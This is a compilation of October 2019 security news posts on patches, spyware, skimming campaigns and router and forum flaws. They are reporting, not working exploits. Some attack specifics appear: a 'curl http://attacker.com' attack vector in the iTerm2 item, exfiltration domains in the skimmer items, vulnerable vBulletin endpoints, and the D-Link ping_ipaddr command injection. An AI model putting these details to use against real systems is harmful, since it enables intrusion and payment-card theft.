SAP also addressed a Binary Planting vulnerability in several SAP software products, including Anywhere, SAP IQ and SAP Dynamic Tiering. The flaw tracked as CVE-2019-0381 resides in the file search algorithm of the affected products, it received a CVSS score of 7.8.

“The algorithm searches too many directories, even if they are out of the application scope.” Onapsis explains. “Possible impacts are path traversals and directory climbing, enabling an attacker to read, overwrite, delete, and expose arbitrary files of the system. This can also lead to DLL hijacking as well as to privilege elevation.”

SAP also addressed multiple Cross-Site Scripting (XSS) vulnerabilities in its products, rated as medium, including one in Customer Relationship Management (CVE-2019-0368), and multiple issues in the SAP BusinessObjects Business Intelligence Platform (CVE-2019-0374, CVE-2019-0375, CVE-2019-0376, CVE-2019-0377, and CVE-2019-0378),

The full list of the addressed issues in SAP Security Patch Day – October 2019 is available here.

Pierluigi Paganini

(SecurityAffairs – SAP, hacking)

The post SAP October 2019 Security Patch Day fixes 2 critical flaws appeared first on Security Affairs.

Tor Project is going to remove End-Of-Life relays from the network

Maintainers at the Tor Project have removed from its network more than 800 relay servers running outdated and EOL versions of the Tor software.

Currently, the Tor network is composed of more than 6000 relays, some of them running outdated Tor software versions (in some cases back to the 0.2.4.x versions). Other relays are running the latest Tor software in nightly builds and alpha releases. Maintainers of the Tor Project announced they have removed relay servers running outdated and EOL versions of the Tor software.

Tor Project experts pointed out that they currently maintain only 5 Tor version series, 0.2.9.x (LTS), 0.3.5.x (LTS), 0.4.0.x, 0.4.1.x, 0.4.2.x (Stable on Dec 15th, 2019).

Now the maintainers of the project announced to have removed roughly 13.5% of the relay servers, 750 acting as Tor middle relays and 62 as exit relays.

The presence of End-Of-Life relays in the Tor Network has multiple negative impacts on network stability and security, it also impacts maintenance activities because it is not easy to roll out important fixes and new features for them.

“In the past weeks, we’ve taken steps to contact every relay operator with a valid ContactInfo field to ask them to upgrade to the latest stable release. The Tor relay community was informed via the tor-relays mailing list on September 3rd 2019 of this upcoming change.” reads the announcement published by the Tor Project.

“The End-Of-Life relays in the network currently make up just over 12% of the total bandwidth, or around 750 relays. Out of these, only 62 are Exit relays accounting for only 1.68% of the total Exit traffic. We expect a minor impact on the size of the network, and a small drop in the Metrics graph.”

The maintainers expect a new Tor stable release in November, it will reject End-Of-Life relays by default. Until then, the maintainers will reject obsolete relays using their fingerprints.

Instruction to upgrading End-Of-Life relays are included in the announcement.

Pierluigi Paganini

(SecurityAffairs – Tor, privacy)

The post Tor Project is going to remove End-Of-Life relays from the network appeared first on Security Affairs.

Amnesty claims that 2 Morocco rights advocates were targeted by NSO Group spyware

NSO Group ‘s surveillance spyware made the headlines again, this time the malware was used to spy on 2 rights activists in Morocco according Amnesty International.

Amnesty International collected evidence of new abuses of the NSO Group ‘s surveillance spyware, this time the malware was used to spy two rights activists in Morocco.

Experts at Amnesty International analyzed the device of evidence of Abdessadak El Bouchattaoui and confirmed it was targeted repeatedly with malicious SMS messages that carried links to websites connected to NSO Group’s Pegasus spyware.

“After checking his devices for evidence of targeting, Amnesty International was able to confirm that Abdessadak El Bouchattaoui was indeed targeted repeatedly with malicious SMS messages that carried links to websites connected to NSO Group’s Pegasus spyware.” reads the analysis published by Amnesty International.

The organization also discovered that the spyware was also used to spy on Maati Monjib, the right group believes the operation is part of state-sponsored repression of human rights defenders.

Bouchattaoui is a lawyer and HRD, in February 2017, a court in Al Hoceima sentenced him to 20 months in prison and a fine for online posts in which he criticized the use of excessive force by the authorities during the social justice protests in the Hirak El-Rif across 2016 and 2017. Monjib is a historian and a columnist, co-founder of the NGO Freedom that in 2015 was accused of threatening the internal security of the state ”through “propaganda.”

NSO Group Pegasus

The victims were targeted with messages related to the Hirak El-Rif movement and the subsequent repression by the Moroccan security forces. The messages included links that once clicked by the victims will start the attack chain that would allow the attacker to remotely control the device.

The links used in these attacks are similar to the ones detected by in June 2018 by Amnesty International in operations against an Amnesty staff member and a Saudi HRD.

“SMS messages sent to Moroccan Human Rights Defenders, as documented in this report, also carry similar links to the same set of Internet infrastructure attributed to NSO Group.” states the report.

“NSO Group is known to only sell its spyware to government intelligence and law enforcement agencies, raising serious concerns that Moroccan security agencies are behind the surveillance,”

NSO Group refuses any accusation and claims that its surveillance technology is only used for lawful purposes. 

In May, Amnesty International filed a lawsuit against Israeli surveillance firm NSO, the lawsuit was filed in Israel by about 50 members and supporters of the human rights group. The organization calls on the Israeli ministry of defence to ban the export of the Pegasus surveillance software developed by NSO Group.

Pierluigi Paganini

(SecurityAffairs – NSO Group, hacking)

The post Amnesty claims that 2 Morocco rights advocates were targeted by NSO Group spyware appeared first on Security Affairs.

Ops, popular iTerm2 macOS Terminal App is affected by a critical RCE since 2012

Security experts discovered a critical remote code execution vulnerability, tracked as CVE-2019-9535, in the GPL-licensed iTerm2 macOS terminal emulator app.

Security experts at cybersecurity firm Radically Open Security (ROS) discovered a 7-year old critical remote code execution vulnerability in the GPL-licensed iTerm2 macOS terminal emulator app.

The iTerm2 macOS terminal emulator app is one of the most popular open-source replacements for Mac’s built-in terminal app.

The RCE flaw tracked as CVE-2019-9535 was discovered as part of an independent security audit funded by the Mozilla Open Source Support Program (MOSS).

“A security audit funded by the Mozilla Open Source Support Program (MOSS) has discovered a critical security vulnerability in the widely used macOS terminal emulator iTerm2.” reads the security advisory published by Mozilla. “During the audit, ROS identified a critical vulnerability in the tmux integration feature of iTerm2; this vulnerability has been present in iTerm2 for at least 7 years. An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer.”

The RCE vulnerability resides in the tmux integration feature of iTerm2, it could be exploited by an attacker to execute arbitrary commands by providing malicious output to the terminal.

The experts published a video PoC that shows how to exploit the vulnerability by producing output to the terminal. Possible attack vectors would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log.

“Typically, this vulnerability would require some degree of user interaction or trickery; but because it can be exploited via commands generally considered safe, there is a high degree of concern about the potential impact,” Mozilla concludes.

The iTerms2 version 3.3.6 addresses the flaw that affects prior versions.

Pierluigi Paganini

(SecurityAffairs – iTerms2, hacking)

The post Ops, popular iTerm2 macOS Terminal App is affected by a critical RCE since 2012 appeared first on Security Affairs.

Multiple APT groups are exploiting VPN vulnerabilities, NSA warns

NSA is warning of multiple state-sponsored cyberespionage groups exploiting enterprise VPN Flaws

Last week, the UK’s National Cyber Security Centre (NCSC) reported that advanced persistent threat (APT) groups have been exploiting recently disclosed VPN vulnerabilities in enterprise VPN products in attacks in the wild. Threat actors leverage VPN vulnerabilities in Fortinet, Palo Alto Networks and Pulse Secure, to breach into the target networks.

The UK agency reported that APT groups target several vulnerabilities, including CVE-2019-11510 and CVE-2019-11539 in Pulse Secure VPN solutions, and CVE-2018-13379,

The CVE-2018-13379 is a path traversal vulnerability in the FortiOS SSL VPN web portal that could be exploited by an unauthenticated attacker to download FortiOS system files. The CVE-2018-13379 flaw could be exploited to obtain administrator credentials in plain text.

The CVE-2019-11510 flaw in Pulse Connect Secure is a critical arbitrary file read vulnerability.

APT groups also exploit CVE-2018-13382, CVE-2018-13383, and CVE-2019-1579, in Palo Alto Networks products.

The vulnerabilities were first reported in July by researchers Orange Tsai and Meh Chang from DEVCORE that found several flaws in Fortinet, Palo Alto Networks and Pulse Secure products. The issues could be exploited by threat actors to access corporate networks and steal sensitive documents

Microsoft researchers recently reported that the APT5 cyberespionage group (aka MANGANESE) has been exploiting VPN vulnerabilities since July, some weeks before PoC exploits were publicly discosed.

Now NSA is warning of multiple state-sponsored cyberespionage groups exploiting enterprise VPN Flaws

“Multiple Nation State Advanced Persistent Threat (APT) actors have weaponized CVE-2019-11510, CVE-2019-11539, and CVE-2018-13379 to gain access to vulnerable VPN devices.” reads the security advisory published by the NSA.

“If a malicious actor previously exploited the vulnerability to collect legitimate credentials, these credentials would still be valid after patching. NSA recommends resetting credentials after a vulnerable VPN device is upgraded and before it is reconnected to the external network:

  • Immediately update VPN user, administrator, and service account credentials.
  • Immediately revoke and generate new VPN server keys and certificates. This may require redistributing VPN connection information to users.
  • If compromise is suspected, review accounts to ensure no new accounts were created by adversaries.”

Both NCSC or NSA intelligence agencies confirmed that APT groups targeted several sectors, including military, government, academic, business and healthcare. The security advisories published by the agencies did not name any APTs leveraging the above VPN vulnerabilities.

In August, BadPackets experts observed a mass scanning activity targeting Pulse Secure “Pulse Connect Secure” VPN endpoints vulnerable to CVE-2019-11510. At the time, over 14,000 vulnerable Pulse Secure endpoints were hosted by more than 2,500 organizations. The number of vulnerable endpoints dropped to roughky 6,000 by October 8, most of them in the United States, Japan and the UK.

Pierluigi Paganini

(SecurityAffairs – VPN vulnerabilities, hacking)

The post Multiple APT groups are exploiting VPN vulnerabilities, NSA warns appeared first on Security Affairs.

vBulletin addresses three new high-severity vulnerabilities

vBulletin has recently published a new security patch update that addresses three high-severity vulnerabilities in the popular forum software.

vBulletin has recently published a new security patch update that addresses three high-severity flaws in vBulletin 5.5.4 and prior versions.

The vulnerabilities could be exploited by remote attackers to take complete control over targeted web servers and steal sensitive user information.

The first vulnerability, tracked as CVE-2019-17132, is a remote code execution flaw reported by security researcher Egidio Romano.

The vulnerability resides in the way vBulletin forum handles user requests to update avatars for their profiles, a remote attacker could exploit it to inject and execute arbitrary PHP code on the target server through unsanitized parameters. The vulnerability could not be triggered in the default installation of the vBulletin forum.

“User input passed through the “data[extension]” and “data[filedata]” parameters to the “ajax/api/user/updateAvatar” endpoint is not properly validated before being used to update users’ avatars. This can be exploited to inject and execute arbitrary PHP code.” reads the security advisory. “Successful exploitation of this vulnerability requires the “Save Avatars as Files” option to be enabled (disabled by default).”

Proof of code is available at the following URL:

http://karmainsecurity.com/pocs/CVE-2019-17132

The remaining critical vulnerabilities addressed by vBulletin are two SQL injection issues, both tracked as CVE-2019-17271.

“1) User input passed through keys of the “where” parameter to the “ajax/api/hook/getHookList” endpoint is not properly validated before being used in an SQL query. This can be exploited to e.g. read sensitive data from the database through in-band SQL injection attacks. Successful exploitation of this vulnerability requires an user account with the “canadminproducts” or “canadminstyles” permission.” reads the security advisory.

2) User input passed through keys of the “where” parameter to the “ajax/api/widget/getWidgetList” endpoint is not properly validated before being used in an SQL query. This can be exploited to e.g. read sensitive data from the database through time-based SQL injection attacks. Successful exploitation of this vulnerability requires an user account with the “canusesitebuilder” permission.

The two vulnerabilities could allow administrators with restricted privileges to read sensitive data from the database.

Romano reported all the flaws to the vBulletin maintainers on September 30 that released the following security patch updates.

Last month, vBulletin released a patch for a critical zero-day remote code execution vulnerability.

Pierluigi Paganini

(SecurityAffairs – vBulletin, hacking)

The post vBulletin addresses three new high-severity vulnerabilities appeared first on Security Affairs.

Hackers compromised Volusion infrastructure to siphon card details from thousands of sites

Hackers have compromised the infrastructure of Volusion and are distributing malicious software skimmers to steal payment card data provided by users.

Volusion is a privately-held technology company that provides ecommerce software and marketing and web design services for small and medium sized businesses. The company has over 250 employees and has served more than 180,000 customers since its founding in 1999.

Hackers have compromised the infrastructure of Volusion and are distributing malicious software skimmers to steal payment card data provided by users. Experts report more than 6,500 stores have been hacked, but they believe that tens of thousands of e-commerce platforms may have been compromised.

The discovery was made by Check Point security researcher Marcel Afrahim that shared his findings in a blog post on Medium.

The experts initially noticed that the Sesame Street Live online store was compromised, it is built with Volusion’s All-in-One E-commerce Website Builder and the name servers are maintained by the Volusion’s Name servers.

While analyzing the checkout page the expert noticed that all the resources are loading from sesamestreetlivestore.com or volusion.com affiliated websites, except for an odd javascript file being loaded from storage.googleapis.com having bucket name of volusionapi

This suggests that hackers gained access to Google Cloud infrastructure of Volusion, they were able to inject in JavaScript file the malicious code that siphons payment card details.

volusion hack

The compromised script was located at at https://storage.googleapis.com/volusionapi/resources.js and is loaded on Volusion-based online stores via the /a/j/vnav.js file.

“At its core, the additional code consists of two sections. The first section is reading the values entered at the Credit Card information fields and after a series of checks, it’s Base64 encoded along with serialization and simple shift operation, So that a simple Base64 deobfuscation would not reveal the data.” reads the post published by the researcher. “The second part of the script is responsible for reading that data stored and posting it to their primary server hxxps://volusion-cdn.com/analytics/beacon.”

Who is behind the attack?

The attackers’ TTPs suggest the involvement of one of the Magecart groups, that in the past already used public cloud storage to host their malicious scripts. 

A report recently published by RiskIQ, the experts estimated that the group has impacted millions of users. RiskIQ reports a total of 2,086,529 instances of Magecart detections, most of them are supply-chain attacks.

Pierluigi Paganini

(SecurityAffairs – Volusion, hacking)

The post Hackers compromised Volusion infrastructure to siphon card details from thousands of sites appeared first on Security Affairs.

Twitter inadvertently used Phone Numbers collected for security for Ads

Twitter admitted having “inadvertently” used phone numbers and email addresses, collected for security purposes, for advertising.

Twitter apologized to have used phone numbers and email addresses, privided by the users for security purposes, for advertising. According to the social media company, data used for account authentication were also matched with advertisers’ database to improve the efficiency of ads.

“We recently discovered that when you provided an email address or phone number for safety or security purposes (for example, two-factor authentication) this data may have inadvertently been used for advertising purposes, specifically in our Tailored Audiences and Partner Audiences advertising system.” reads a post published by Twitter.

At the time of writing it is unclear the number of impacted Twitter users.

The company attempted to downplay the severity of the privacy incident highlighting that none of the user data was shared with partners outside the company.

The Twitter Tailored Audiences product allows advertisers to target ads to customers based on the advertiser’s own marketing lists that includes info such as email addresses or phone numbers. Partner Audiences allows advertisers to use the same Tailored Audiences features to target ads to audiences provided by third-party partners.

Twitter admitted that when an advertiser uploaded their marketing list, its staff may have matched the information included in these lists with data provided by its users to protect their accounts.

The root cause of the problem was addressed in September 17, 2019.

“We cannot say with certainty how many people were impacted by this, but in an effort to be transparent, we wanted to make everyone aware. No personal data was ever shared externally with our partners or any other third parties.” added Twitter.

“We’re very sorry this happened and are taking steps to make sure we don’t make a mistake like this again,”

Pierluigi Paganini

(SecurityAffairs – Twitter, privacy)

The post Twitter inadvertently used Phone Numbers collected for security for Ads appeared first on Security Affairs.

Researchers discovered a code execution flaw in NSA GHIDRA

Security researchers discovered a code-execution vulnerability that affects versions through 9.0.4 of the Ghidra software reverse engineering (SRE) framework.

GHIDRA is a multi-platform reverse engineering framework that runs on major OSs (Windows, macOS, and Linux).

The framework was first mentioned in the CIA Vault 7 dump that was leaked in 2017. WikiLeaks obtained thousands of files allegedly originating from a CIA high-security network that details CIA hacking techniques, tools, and capabilities. Digging in the huge trove of files, it is possible to find also information about the GHIDRA, a Java-based engineering tool.

NSA has released the suite Ghidra in March, it could be used to find vulnerabilities and security holes in applications.

Ghidra is Apache 2.0-licensed and requires a Java runtime, it is available
for download here. Of course, people fear the US Agency may have introduced a backdoor in the suite, but the NSA excluded it.

A couple of weeks ago, security researchers discovered a vulnerability in the Ghidra tool, tracked as CVE-2019-16941, that could be exploited by an attacker to execute arbitrary code within the context of the affected application. The researchers discovered that the flaw could be exploited only when the experimental mode is enabled.

The vulnerability resides in the Read XML Files feature of Bit Patterns Explorer, an attacker could exploit it by using modified XML documents.

“NSA Ghidra through 9.0.4, when experimental mode is enabled, allows arbitrary code execution if the Read XML Files feature of Bit Patterns Explorer is used with a modified XML document.” reads the security advisory. “This occurs in Features/BytePatterns/src/main/java/ghidra/bitpatterns/info/FileBitPatternInfoReader.java. An attack could start with an XML document that was originally created by DumpFunctionPatternInfoScript but then directly modified by an attacker (for example, to make a java.lang.Runtime.exec call).”

The vulnerability has been rated as “critical severity” and received a CVSS score of 9.8.

The NSA attempted to downplay the severity of the flaw explaining that it is hard to exploit.

The good news is that the issue has been already fixed, a patch is available for those who build Ghidra themselves from the master branch.

The Ghidra 9.1 release, that is currently in beta testing, will also address the flaw.

Pierluigi Paganini

(SecurityAffairs – NSA, hacking)

The post Researchers discovered a code execution flaw in NSA GHIDRA appeared first on Security Affairs.

MS October 2019 Patch Tuesday updates address 59 flaws

Microsoft October 2019 Patch Tuesday addressed a total of 59 vulnerabilities. 9 of which are rated as critical and 49 as important.

The tech giant released its October 2019 Patch Tuesday security updates to address a total of 59 vulnerabilities in Windows operating systems and other software, 9 of which are rated as ‘critical’, 49 are ‘important’, and one ‘moderate’.

None of the vulnerabilities addressed by Microsoft was exploited by attackers in the wild or was publicly known.

Microsoft addressed two critical remote code execution flaws, tracked as CVE-2019-1238 and CVE-2019-1239, in the VBScript engine, both tie the way VBScript handles objects in memory. An attacker could exploit the flaw to cause memory corruption and execute arbitrary code in the context of the current user.

An attacker could trigger the flaws by tricking the victims into visiting a specially crafted website through Internet Explorer.

The attacker could also exploit these flaws using an application or Microsoft Office document that embeds an ActiveX control marked ‘safe for initialization’ that leverages the Internet Explorer rendering engine.

Microsoft addressed three critical memory corruption flaws in the Chakra scripting engine that could lead to remote code execution. The vulnerabilities affect the way Chakra scripting engine handles objects in memory in Microsoft Edge.

Microsoft has addressed a reverse RDP attack, an attacker could exploit the flaw to compromise client computers connecting to a malicious RDP server by exploiting a critical remote code execution issue in Windows built-in Remote Desktop Client application.

The attack scenario sees threat actors tricking victims into connecting to a malicious RDP server.

October 2019 Patch Tuesday security updates also addressed two NTLM authentication vulnerabilities, tracked as CVE 2019-1166 and CVE-2019-1338 that could be exploited by attackers to bypass the MIC (Message Integrity Code) protection on NTLM authentication.

“A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection. An attacker who successfully exploited this vulnerability could gain the ability to downgrade NTLM security features.” reads the security advisory for the CVE 2019-1166.

“To exploit this vulnerability, the attacker would need to tamper with the NTLM exchange. The attacker could then modify flags of the NTLM packet without invalidating the signature.”

The full list of vulnerabilities addressed with the release of October 2019 Patch Tuesday updates is available here.

Pierluigi Paganini

(SecurityAffairs – October 2019 Patch Tuesday updates, hacking)

The post MS October 2019 Patch Tuesday updates address 59 flaws appeared first on Security Affairs.

Experts found a link between a Magecart group and Cobalt Group

Researchers from MalwareBytes and HYAS Threat Intelligence linked one of the hacking groups under the Magecart umbrella to the notorious Cobalt cybercrime Group.

Hacker groups under the Magecart umbrella continue to target organizations worldwide to steal payment card data with so-called software skimmers. Security firms have monitored the activities of a dozen groups at least since 2010

According to a joint report published by RiskIQ and FlashPoint, some groups are more advanced than others, in particular, the gang tracked as Group 4 appears to be very sophisticated.

The list of victims of the groups is long and includes several major platforms such as British AirwaysNeweggTicketmasterMyPillow and Amerisleep, and Feedify

Millions of Magecart instances were detected over time, security experts discovered tens of software skimming scripts.

Researchers at RiskIQ estimate that the group has impacted millions of users. RiskIQ reports a total of 2,086,529 instances of Magecart detections, most of them are supply-chain attacks.

The same team of experts has determined that the Magecart infrastructure is vast, with 573 known C2 domains, and 9,189 hosts observed loading C2 domains. 

A new joint report published by researchers at Malwarebytes and HYAS Threat Intelligence reveals that some groups under the Magecart umbrella are linked to Magecart attackers.

The experts found a link between the Magecart Group 4 and the Cobalt cybercrime Gang, such as patterns in the email addresses used to register domains used in Magecart operations.

“One group that caught our interest is Group 4, which is one of the more advanced cybercriminal organizations. While working jointly with security firm HYAS, we found some interesting patterns in the email addresses used to register domains belonging to Magecart matching those of a sophisticated threat group known as Cobalt Group, aka Cobalt Gang or Cobalt Spider.” reads the blog post published by MalwareBytes.

Cobalt crime gang is a Russian hacking crew that has been active since at least 2016, it targeted banks worldwide, the group leveraged spear-phishing emails to compromise target systems, spoofed emails from financial institutions or a financial supplier/partner.

Experts pointed out that Group 4, unlike other Magecart groups, leverages on both client-side and server-side skimmers.

One of client-side skimmers analyzed by the researchers was masqueraded as the jquery.mask.js plugin, the attackers appended the malicious code at the end of the script and protected it with some layers of obfuscation. 

Experts also analyzed a server-side skimmer, it is a PHP script that was mistakenly served as JavaScript instead.

“This little code snippet looks for certain keywords associated with a financial transaction and then sends the request and cookie data to the exfiltration server at secureqbrowser[.]com. An almost exact copy of this script was described by Denis Sinegubko of Sucuri in his post Autoloaded Server-Side Swiper.” continues the report.

Experts noticed that in both attacks, the domains were registered to robertbalbarran(at)protonmail.com.

The analysis of the exfiltration gates allowed the researchers to link them to other registrant emails and identify a pattern for the format of email addresses ([first name][initial][last name]).

Experts noticed that the Cobalt Group also has switched to this technique.

“A small shift from one of their previous conventions of [firstname],[lastname], [fournumbers] (overwhelmingly using protonmail accounts, with a handful of tutanota/keemail.me email accounts) changed to the above-noted convention of [firstname], [initial], [lastname] again using the same email services and registrars, and notably the same use of privacy protection services.” continues the experts.

Further investigation allowed the experts to discover that 10 of the seemingly separate accounts reused only two different IP addresses, even over weeks and months between registrations.

One email address, petersmelanie(at)protonmail.com, was used to register 23 domains, including one involved in a phishing campaign leveraging the CVE-2017-0199 flaw and other attacks against Oracle and various banks.

“Based on their historical ties to the space, and the entrance of sophisticated actor groups such as FIN6 and others, it’s logical to conclude that Cobalt Group would also enter this field and continue to diversify their criminal efforts against global financial institutions,” concludes the report. “The use of both client-side and server-side skimmers and the challenges this poses in identifying Magecart compromises by advanced threat groups necessitates the ongoing work of industry partners to help defend against this significant and growing threat.”

Pierluigi Paganini

(SecurityAffairs – Magecart, Cobalt group)

The post Experts found a link between a Magecart group and Cobalt Group appeared first on Security Affairs.

Users reported problems with patches for CVE-2019-1367 IE zero-day

Patches for Internet Explorer Zero-Day Causing Problems for Many Users

Microsoft released a new set of patches for a zero-day flaw in Internet Explorer recently fixed due to problems reported by users with the previous patch.

On September 23, Microsoft released an out-of-band patch to address a zero-day memory corruption flaw in Internet Explorer (CVE-2019-1367) that has been exploited in attacks in the wild.

The vulnerability resides in the Internet Explorer’s scripting engine, it affects the way that objects in memory are handled. 

An attacker could exploit the vulnerability to gain the same privileges as the current user, the attack could be critical if the current user gains administrative privileges.

In order to exploit the vulnerability, an attacker could host a specially crafted website that is designed to trigger the flaw when Internet Explorer users will visit it. The attacker only has to trick victims into visiting the malicious website, for example, by sending to the victims a link to the malicious website via email or in a malicious email attachment (HTML file, PDF file, Microsoft Office document) that supports embedding the scripting engine content.

“A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.” reads the security advisory published by Microsoft. “An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. “

On October 3, Microsoft released another set of patches for the zero-day vulnerability, because some users experienced certain printing issues following the installation of the initially released by the tech giant.

“To address a known printing issue customers might experience after installing the Security Updates or IE Cumulative updates that were released on September 23, 2019 for CVE-2019-1367, Microsoft is releasing new Security Updates, IE Cumulative Updates, and Monthly Rollup updates for all applicable installations of Internet Explorer 9, 10, or 11 on Microsoft Windows,” reads Microsoft Security Update Releases notification email sent to the users.

Several users reported that the cumulative update released by Microsoft is causing also boot issues and the crash of the start menu.

Microsoft pointed out that the IE Cumulative updates are separate from the October Patch Tuesday updates which are scheduled for October 8.

Pierluigi Paganini

(SecurityAffairs – CVE-2019-1367, hacking)

The post Users reported problems with patches for CVE-2019-1367 IE zero-day appeared first on Security Affairs.

Hackers continue to exploit the Drupalgeddon2 flaw in attacks in the wild

Researchers from Akamai uncovered a new campaign targeting the Drupalgeddon2 vulnerability to deliver malware.

The popular security expert Larry W. Cashdollar from Akamai has uncovered a new campaign targeting the popular Drupalgeddon2 vulnerability (CVE-2018-7600) to deliver malware.

Drupalgeddon2 is a “highly critical” vulnerability that affects Drupal 7 and 8 core, it could be exploited by an attacker to run arbitrary code on the CMS core component and take over a website just by accessing an URL.

The Drupal development team has fixed the vulnerability in March 2018, but hackers continue to target Drupalgeddon2 in the wild.

The campaign recently discovered by Cashdollar sees the attackers attempting to run malicious code embedded in a .gif file.

The expert explained that the campaign is currently not widespread, it is targeting a broad range of high profile websites.

“I observed an attack that  is designed to run code that is embedded inside a .gif file. While embedding code in image file isn’t a new attack method, I haven’t seen this method in quite some time.” reads the analysis published by Cashdollar.

“The attack traffic doesn’t appear to be widespread at this time, nor does it appear to be specifically targeting a single industry vertical. Currently, the attack traffic seems to be directed towards a random assortment of high profile websites. The code I will be examining is embedded in the file index.inc.gif, which appears to be hosted on a compromised bodysurfing website located in Brazil.”

One of .gif files analyzed by the experts was hosted on a compromised bodysurfing website located in Brazil. The file contained obfuscated PHP code designed to decode base64-encoded malware that was stored by threat actors in a variable.

“The commands clean up any previous installations and then replace any .htaccess configurations with versions that have less restrictive settings.” continues the analysis. Then two different files are downloaded and then executed. The first, index.inc.gif, contains obfuscated PHP code. It contains a GIF header, but the rest of the file is PHP code obscured using gzip compression, rot13, and base64 encoding.”

The malware supports several functions, such as scanning local files for credentials, sending email with the discovered credentials, replacing the local .htaccess file, displaying MySQL my.cnf configuration files, execute a remote file that is gz compressed and base64 encoded, showing system information, renaming files, uploading files, and launching a web shell.

The campaign also delivers a piece of malware stored in a .txt containing a Perl script that leverages Internet Relay Chat (IRC) for command and control (C&C) communication. The malware implements common RAT features and is also able to launch distributed denial-of-service (DDoS) attacks.

The malware also implements functionalities to gather information from the local system and to control infected systems, it also supports a SQL flood command. The fact that attackers are still exploiting the Drupalgeddon2 flaw highlights the importance of patch management in enterprises.

“Critical vulnerabilities will be targeted, even if their public disclosure date is over a year old. When the vulnerability’s exploitation is simple, which is the case with Drupalgeddon2, attackers will automate the process of scanning, exploitation, and infection when there are poorly maintained and forgotten systems.” Cashdollar concludes. “This creates a problem for enterprise operations and web administrators, as these old forgotten installs are often connected to other critical systems — creating a pivot point on the network.”

“Maintaining patches in a timely fashion, as well as properly decommissioning servers if they’re no longer being used is the best preventative measure that administrators and security teams can take.” 

Pierluigi Paganini

(SecurityAffairs – Drupalgeddon2, hacking)

The post Hackers continue to exploit the Drupalgeddon2 flaw in attacks in the wild appeared first on Security Affairs.

D-Link router models affected by remote code execution issue that will not be fixed

Researchers at Fortinet’s FortiGuard Labs have publicly disclosed a critical remote code execution vulnerability affecting some models of D-Link routers. 

Security experts at Fortinet’s FortiGuard Labs disclosed a remote code execution vulnerability tracked as CVE-2019-16920. The vulnerability is an unauthenticated command injection issue that was discovered on September 2019. The flaw has received a CVSS v31 base score of 9.8 and a CVSS v20 base score of 10.0. 

The bad news for the users is that the vendor will not address it because it affects discontinued products.  

According to the Fortinet, the vulnerability impacts D-Link firmware in the DIR-655, DIR-866L, DIR-652, and DHP-1565 router families.

D-Link router

“In September 2019, Fortinet’s FortiGuard Labs discovered and reported an unauthenticated command injection vulnerability (FG-VD-19-117/CVE-2019-16920) in D-Link products that could lead to Remote Code Execution (RCE) upon successful exploitation. We rated this as a critical issue since the vulnerability can be triggered remotely without authentication.” reads the security advisory published by Fortinet.

The vulnerability could be exploited by an attacker sending arbitrary input to a “PingTest” gateway interface to achieve command injection.

“The vulnerability begins with a bad authentication check. To see the problem in action, we start at the admin page and then perform a login action.” continues the advisory. “Here, we implement the POST HTTP Request to “apply_sec.cgi” with the action ping_test. We then perform the command injection in ping_ipaddr. Even if it returns the login page, the action ping_test is still performed – the value of ping_ipaddr will execute the “echo 1234” command in the router server and then send the result back to our server. “

The experts discovered that it is possible to execute code remotely, even without the necessary privileges, due to bad authentication check.

The researchers reported the vulnerability to D-Link on September 22, the vendor the day after acknowledged the issue, but three days later confirmed that no patch will be released because the products are at End of Life (EOL),

Below the disclosure timeline:

  • 22 September, 2019: FortiGuard Labs reported the vulnerability to D-Link.
  • 23 September, 2019: D-Link confirmed the vulnerability
  • 25 September, 2019: D-Link confirmed these products are EOL
  • 3 October 2019: Public disclosure of the issue and released advisory

Pierluigi Paganini

(SecurityAffairs – routers, hacking)

The post D-Link router models affected by remote code execution issue that will not be fixed appeared first on Security Affairs.

US will help Baltic states to secure baltic energy grid

The United States and Baltic announced cooperation to protect the Baltic energy grid from cyber attacks as they disconnect from the Russian electricity grid.

The US and Baltic agreed to cooperate to protect the Baltic energy grid from cyber attacks as they disconnect from the Russian electricity grid.

US Energy Secretary Rick Perry and counterparts from Lithuanian, Latvian and Estonian counterparts announced the cooperation for the protection of Baltic Energy Grid against cyber attacks in this “critical moment.”

“We see a crucial role that US could play in assisting the Baltic States with strategic and technical support,” reads a joint declaration signed by the officials in the Lithuanian capital Vilnius.

The three states joined both the European Union and NATO in 2004, but they are still part of a power grid controlled by Russia. The three countries will be integrated into the European energy grid by 2025, without depending on the Russian grid.

Lithuanian critical infrastructure, and in particular, organizations in the energy sector, are privileged targets of cyber attacks.

In May 2017, a wave of “exploratory” cyber attacks targeted energy networks of the Baltic states. Baltic attacks raised concerns that foreign states could disable the energy networks in the region.

Experts suspected the involvement of a Russian state actor due to the strategic interest of Russia in the states that are on the political front line between Russia and the West.

“Suspected Russia-backed hackers have launched exploratory cyber attacks against the energy networks of the Baltic states, sources said, raising security concerns inside the West’s main military alliance, NATO.” reported the Reuters agency, “The Baltics are locked into Russia’s power network but plan to synchronize their grids with the EU.”

NATO experts and cybersecurity researchers believe hackers were testing the Baltic energy networks for weaknesses.

Now Lithuania confirmed it was looking for US technology firms to prevent the hack of control energy systems that could disrupt energy supplies.

“Energy minister Zygimantas Vaiciunas said the Baltic ministers also agreed with Perry to set up a cooperation platform for cyber security experts from all four countries within the next six months.” continues the AFP press.

Perry is promoting US liquified natural gas (LNG) exports to Europe, both Lithuania and Poland have already begun importing it.

“We hope that all the citizens of Europe recognize that we certainly look at this (US LNG exports) as a great opportunity to bring more freedom to the marketplace, more competition to the marketplace,” Perry told reporters in Vilnius.

Pierluigi Paganini

(SecurityAffairs – Baltic Energy Grid, hacking)

The post US will help Baltic states to secure baltic energy grid appeared first on Security Affairs.

Data from Sephora and StreetEasy data breaches added to HIBP

The popular data breach notification service Have I Been Pwned? (HIBP) has added the stolen data from the StreetEasy and Sephora data incidents.

Have I Been Pwned? (HIBP), the popular service that allows users to check whether their personal data has been compromised by data breaches has added the stolen data from the StreetEasy and Sephora data incidents.

Users can check if their data have been exposed in the StreetEasy and Sephora data breaches.

